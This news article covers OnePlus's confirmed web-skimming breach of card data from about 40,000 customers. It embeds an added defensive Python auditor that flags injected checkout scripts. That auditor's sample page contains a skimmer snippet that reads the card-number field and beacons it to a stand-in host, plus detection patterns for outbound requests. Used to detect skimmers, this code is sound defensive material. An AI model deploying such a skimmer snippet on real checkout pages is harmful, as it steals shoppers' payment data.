OnePlus has confirmed it suffered a major data breach potentially compromising the payment card details of up to 40,000 customers. In an email sent to customers on Friday, 19 January, the Chinese phone maker said its website, OnePlus.net, was hacked with a malicious script injected into the company's payment page designed to harvest sensitive data from visitors' browsers.
"The malicious script operated intermittently, capturing and sending data directly from the user's browser. It has since been eliminated," OnePlus said in a statement. "We have quarantined the infected server and reinforced all relevant system structures."
Customers who entered their credit card details on OnePlus' website between mid-November 2017 and 11 January 2018 may have been affected by the breach. Compromised data includes customers' credit card numbers, expiry dates and security codes.
The company said users who paid with a previously saved credit card on file, PayPal or the "Credit card via PayPal" methods "should not be affected" by the intrusion. It added that customers' card details are never processed or stored on the OnePlus.net site.
"It is sent directly to our PCI-DSS-compliant payment processing partner over an encrypted connection, and processed on their secure servers," it noted.
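The intrusion described above is a client-side skimmer: a script on the checkout page reads card fields in the shopper's browser and sends them elsewhere, regardless of where the form itself posts. As an added defender-side example (not part of this article and not OnePlus's code), the Python below audits the scripts on a served checkout page against an allowlist of script hosts and a baseline of known inline scripts, and flags inline scripts that both read form fields and make outbound requests. The sample page, the hostnames and the allowlist are all constructed for the example.

```python
"""Audit the <script> tags on a checkout page for signs of an injected skimmer.

Three checks, all run from a defender's copy of the served HTML:
  1. external scripts loaded from a host not on the allowlist,
  2. inline scripts whose hash is not in a known-good baseline,
  3. inline scripts that both read form fields and send data out.
"""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist of hosts that may serve scripts on the checkout page (constructed).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.example"}

# Heuristics for "reads card fields" and "sends data out of the page".
FIELD_ACCESS = re.compile(r"(?:\.value\b|querySelector(?:All)?\(|getElementsByName\(|FormData\()")
OUTBOUND_SEND = re.compile(r"(?:fetch\(|XMLHttpRequest|sendBeacon\(|new\s+Image\(|\.src\s*=)")


class _ScriptCollector(HTMLParser):
    """Collects every <script> element as {"src": url-or-None, "body": text}."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._current = {"src": dict(attrs).get("src"), "body": ""}

    def handle_data(self, data):
        # HTMLParser hands script content to handle_data as raw text.
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def _collect_scripts(html):
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def _fingerprint(body):
    # Whitespace-normalised so formatting-only changes do not break the baseline.
    return hashlib.sha256(" ".join(body.split()).encode("utf-8")).hexdigest()


def inline_fingerprints(html):
    """Return the set of hashes of all inline scripts; build this from a known-clean page."""
    return {_fingerprint(s["body"]) for s in _collect_scripts(html) if s["src"] is None}


def audit_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS, inline_baseline=None):
    """Return a list of (finding_kind, detail) tuples; an empty list means nothing unexpected."""
    findings = []
    for script in _collect_scripts(html):
        if script["src"] is not None:
            host = urlparse(script["src"]).hostname
            # A relative src has no hostname and is same-origin, so it is left alone here.
            if host is not None and host not in allowed_hosts:
                findings.append(("external_script_unexpected_host", script["src"]))
            continue
        body = script["body"]
        if inline_baseline is not None and _fingerprint(body) not in inline_baseline:
            findings.append(("inline_script_not_in_baseline", _fingerprint(body)[:16]))
        if FIELD_ACCESS.search(body) and OUTBOUND_SEND.search(body):
            findings.append(("inline_script_reads_fields_and_sends", " ".join(body.split())[:60]))
    return findings


# Constructed sample pages: a clean checkout page, and the same page with two injected scripts.
CLEAN_CHECKOUT_HTML = """<html><head>
<script src="https://cdn.example/checkout.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body>
<form id="pay" action="https://processor.example/charge" method="post">
<input name="card-number"><input name="cvv">
</form>
</body></html>"""

_INJECTED_SCRIPTS = """<script>
document.getElementById('pay').addEventListener('submit', function () {
  var d = document.querySelector('[name=card-number]').value;
  new Image().src = 'https://example.invalid/c?d=' + encodeURIComponent(d);
});
</script>
<script src="https://example.invalid/analytics.js"></script>
"""
INFECTED_CHECKOUT_HTML = CLEAN_CHECKOUT_HTML.replace("</body>", _INJECTED_SCRIPTS + "</body>")


if __name__ == "__main__":
    baseline = inline_fingerprints(CLEAN_CHECKOUT_HTML)
    for kind, detail in audit_scripts(INFECTED_CHECKOUT_HTML, inline_baseline=baseline):
        print(f"{kind}: {detail}")
```

In practice the baseline is captured from a release build of the page and the audit is run periodically against what the live site actually serves to a browser, since a script injected server-side only shows up in the served response. The host allowlist is the same list a Content-Security-Policy `script-src` directive would carry, and the two complement each other: CSP blocks the load in the browser, the audit tells the operator something changed.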
Only potentially affected users have received a notification email regarding the breach and have been offered a year of credit monitoring.
The disclosure comes several days after reports of credit card fraud began popping up earlier this month after users purchased OnePlus products from the official OnePlus.net store. The company temporarily shut down credit card payments for its online store last week and launched an investigation into the "serious issue" with the assistance of a third-party security firm.
The issue was first reported by forum user @superdutynick.
OnePlus has not provided any details of the cause of the breach or when the malicious script was inserted by hackers.
Customers have been advised to check their payment card statements for any potentially suspicious activity.
"We cannot apologise enough for letting something like this happen. We are eternally grateful to have such a vigilant and informed community, and it pains us to let you down," the company said. "We are in contact with potentially affected customers. We are working with our providers and local authorities to better address the incident.
"We are also working with our current payment providers to implement a more secure credit card payment method, as well as conducting an in-depth security audit. All these measures will help us prevent such incidents from happening in the future."